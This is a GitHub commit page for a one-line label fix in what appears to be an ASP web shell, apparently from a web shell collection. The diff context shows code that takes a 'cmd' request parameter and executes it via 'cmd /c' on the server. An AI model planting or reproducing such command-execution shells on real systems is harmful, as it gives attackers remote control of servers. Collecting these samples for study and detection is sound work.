Merge pull request #38 from RobinvandenHurk/patch-1

Fixed label
This commit is contained in:
tennc 2020-10-22 23:26:08 +08:00 committed by GitHub
commit e9b09f671b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -39,7 +39,7 @@ end Function
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)